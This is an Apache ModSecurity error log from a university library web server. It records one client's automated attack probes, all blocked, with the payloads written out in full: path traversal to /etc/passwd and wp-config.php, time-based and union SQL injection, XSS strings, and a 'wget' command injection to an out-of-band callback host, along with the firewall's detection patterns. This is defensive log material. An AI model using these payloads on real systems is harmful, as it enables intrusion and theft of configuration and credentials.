[Tue Aug 29 11:48:33.436517 2023] [:error] [pid 2373] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14ocCo-f0AAAlFH5IAAAAk"]
[Tue Aug 29 11:48:35.346888 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:path: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/pacs/nocache.php"] [unique_id "ZO14o8Co-f0AAAlUldkAAAA0"]
[Tue Aug 29 11:48:35.365287 2023] [:error] [pid 2404] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14o8Co-f0AAAlkwgIAAAAO"]
[Tue Aug 29 11:48:36.494912 2023] [:error] [pid 2363] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:comment: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO14pMCo-f0AAAk7QJkAAAAi"]
[Tue Aug 29 11:48:37.425175 2023] [:error] [pid 2404] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "ZO14pcCo-f0AAAlkwgsAAAAO"]
[Tue Aug 29 11:48:38.403789 2023] [:error] [pid 2363] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:randomId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:randomId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php"] [unique_id "ZO14psCo-f0AAAk7QJ0AAAAi"]
[Tue Aug 29 11:48:40.440691 2023] [:error] [pid 2358] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULTPAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:RESULTPAGE: ../../../../../../../../../../../../../../../../Windows/system.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/WEBACCOUNT.CGI"] [unique_id "ZO14qMCo-f0AAAk2KX8AAAAb"]
[Tue Aug 29 11:48:43.404764 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within XML: 111112331%' union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/plus/weixin.php"] [unique_id "ZO14q8Co-f0AAAkrz@8AAAAC"]
[Tue Aug 29 11:48:43.430778 2023] [:error] [pid 2363] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:appno: 0 union select 98989*443131,1-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14q8Co-f0AAAk7QK0AAAAi"]
[Tue Aug 29 11:48:47.351889 2023] [:error] [pid 2381] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:fileName: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/plugins/servlet/snjFooterNavigationConfig"] [unique_id "ZO14r8Co-f0AAAlNqsgAAAAt"]
[Tue Aug 29 11:48:49.374169 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mosConfig_absolute_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:mosConfig_absolute_path: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/administrator/components/com_joomla-visites/core/include/myMailer.class.php"] [unique_id "ZO14scCo-f0AAAkAMKIAAAAU"]
[Tue Aug 29 11:48:49.420433 2023] [:error] [pid 2346] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14scCo-f0AAAkqHtoAAAAM"]
[Tue Aug 29 11:48:49.430408 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(6)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14scCo-f0AAAkAMKMAAAAU"]
[Tue Aug 29 11:48:50.383548 2023] [:error] [pid 2437] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(16)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14ssCo-f0AAAmFny4AAAAx"]
[Tue Aug 29 11:48:51.398854 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14s8Co-f0AAAlIBZ4AAAAn"]
[Tue Aug 29 11:48:52.452565 2023] [:error] [pid 2363] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14tMCo-f0AAAk7QLQAAAAi"]
[Tue Aug 29 11:48:53.377529 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-destination-id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-destination-id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO14tcCo-f0AAAj12JEAAAAa"]
[Tue Aug 29 11:48:54.417033 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:date: 2022-05-27' union select 1,2,3,md5('999999999'),5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14tsCo-f0AAAjtdCYAAAAX"]
[Tue Aug 29 11:48:55.401758 2023] [:error] [pid 2384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO14t8Co-f0AAAlQ3scAAAAw"]
[Tue Aug 29 11:48:55.468354 2023] [:error] [pid 2352] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sbFileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:sbFileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/jsp/help-sb-download.jsp"] [unique_id "ZO14t8Co-f0AAAkwQTsAAAAS"]
[Tue Aug 29 11:48:56.399374 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/tiki-5.2/tiki-edit_wiki_section.php"] [unique_id "ZO14uMCo-f0AAAkyx-8AAAAW"]
[Tue Aug 29 11:48:57.448428 2023] [:error] [pid 2373] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/themes/oxygen-theme/download.php"] [unique_id "ZO14ucCo-f0AAAlFH7oAAAAk"]
[Tue Aug 29 11:48:57.450879 2023] [:error] [pid 2382] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:path: ../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php/Home/uploadify/fileList"] [unique_id "ZO14ucCo-f0AAAlOZKEAAAAu"]
[Tue Aug 29 11:48:57.459711 2023] [:error] [pid 2438] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/tiki-edit_wiki_section.php"] [unique_id "ZO14ucCo-f0AAAmG@qgAAAAy"]
[Tue Aug 29 11:48:58.370570 2023] [:error] [pid 2438] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_variables. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:_variables: {\\x22_metadata\\x22:{\\x22classname\\x22:\\x22i/../lib/password.properties\\x22},\\x22_variables\\x22:[]}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc"] [unique_id "ZO14usCo-f0AAAmG@qkAAAAy"]
[Tue Aug 29 11:49:02.366636 2023] [:error] [pid 2379] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sysCmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:sysCmd: wget http:/cjmnbitjmimt14dgn26g81dbeefpm768h.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/boafrm/formSysCmd"] [unique_id "ZO14vsCo-f0AAAlL7EAAAAAq"]
[Tue Aug 29 11:49:04.506644 2023] [:error] [pid 2381] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /..././/..././/..././/..././/..././/..././/..././/..././ found within ARGS:filePath: wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/File/DownloadFile"] [unique_id "ZO14wMCo-f0AAAlNquMAAAAt"]
[Tue Aug 29 11:49:05.417968 2023] [:error] [pid 2408] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id_products[]: (select*from(select(sleep(6)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14wcCo-f0AAAlo008AAAAJ"]
[Tue Aug 29 11:49:08.407143 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfkip.unla.ac.id"] [uri "/siteminderagent/forms/smpwservices.fcc"] [unique_id "ZO14xMCo-f0AAAmLPQMAAAAN"]
[Tue Aug 29 11:49:09.390086 2023] [:error] [pid 2342] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:query: {\\x22tax_query\\x22:{\\x220\\x22:{\\x22field\\x22:\\x22term_taxonomy_id\\x22,\\x22terms\\x22:[\\x22\\x22]}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14xcCo-f0AAAkmTjQAAAAF"]
[Tue Aug 29 11:49:09.427348 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfkip.unla.ac.id"] [uri "/siteminderagent/forms/smaceauth.fcc"] [unique_id "ZO14xcCo-f0AAAj12KoAAAAa"]
